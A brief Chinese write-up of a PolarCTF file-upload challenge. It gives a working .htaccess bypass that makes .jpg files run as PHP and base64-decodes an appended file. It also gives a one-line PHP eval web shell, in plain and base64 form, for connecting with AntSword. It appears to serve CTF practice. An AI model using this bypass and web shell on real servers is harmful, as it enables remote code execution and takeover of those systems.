polar CTF上传

1、题目

2、经过测试.htaccess绕过
三行代码解析：
将上传的.jpg文件解析成php文件
auto_append_file包含上传的文件
将上传的文件进行解码

AddType application/x-httpd-php .jpg
php_value auto_append_fi\
le "php://filter/convert.base64-decode/resource=1.jpg"

3、上传文件名为1.jpg的图片码
马为

<?php eval($_POST[c]); ?>

base64后为

PD9waHAgZXZhbCgkX1BPU1RbY10pOyA/Pg==

访问为

蚁剑连接